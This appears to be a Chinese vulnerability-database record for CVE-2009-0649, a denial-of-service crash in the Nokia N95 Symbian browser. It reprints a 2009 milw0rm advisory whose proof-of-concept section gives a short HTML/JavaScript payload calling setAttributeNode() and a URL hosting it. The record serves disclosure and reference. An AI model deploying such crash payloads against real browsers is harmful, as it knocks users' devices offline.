Nokia Symbian s60 Browser "setAttributeNode()" 拒绝服务漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1117395 漏洞类型 设计错误
发布时间 2009-02-13 更新时间 2009-06-25
CVE编号 CVE-2009-0649 CNNVD-ID CNNVD-200902-471
漏洞平台 Hardware CVSS评分 7.8
|漏洞来源
https://www.exploit-db.com/exploits/8051
https://cxsecurity.com/issue/WLB-2009020244
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200902-471
|漏洞详情
Symbian操作系统是Symbian公司为智能手机设计的操作系统,2009年2月Sybian公司被手机制造商Nokia收购。SymbianOSontheNokiaN95手机的web浏览器允许远程攻击者可以借助调用setAttributeNode程序的JavaScript代码,以造成拒绝服务(崩溃)。
|漏洞EXP
Application: Nokia N95-8
OS: Symbian
------------------------------------------------------
1 - Description
2 - Vulnerability
3 - POC/EXPLOIT

------------------------------------------------------
Description

The nokia n95 is a smartphone, this phone have more tools, for example: gps,mp3,camera,wireless.

 :) 

------------------------------------------------------
Vulnerability

The vulnerability is caused when the browser, opened a web with javaScript code. This cause that page crash.

The error is in the method "setAttributeNode", because the bad implement is the cause of bug.

------------------------------------------------------
POC/EXPLOIT

Enter in this url

http://es.geocities.com/jplopezy/nokiacrash2.html


or make html file and insert this code

<input type='checkbox' id='c'>
<script>
r=document.getElementById('c');
a=r.setAttributeNode();
</script>

------------------------------------------------------
Juan Pablo Lopez Yacubian 

# milw0rm.com [2009-02-13]
|参考资料

来源:XF
名称:nokian95-setattributenode-dos(48763)
链接:http://xforce.iss.net/xforce/xfdb/48763
来源:BID
名称:33767
链接:http://www.securityfocus.com/bid/33767
来源:BUGTRAQ
名称:20090213NokiaN95browser"setAttributeNode"methodcrash
链接:http://www.securityfocus.com/archive/1/archive/1/500954/100/0/threaded
来源:MILW0RM
名称:8051
链接:http://www.milw0rm.com/exploits/8051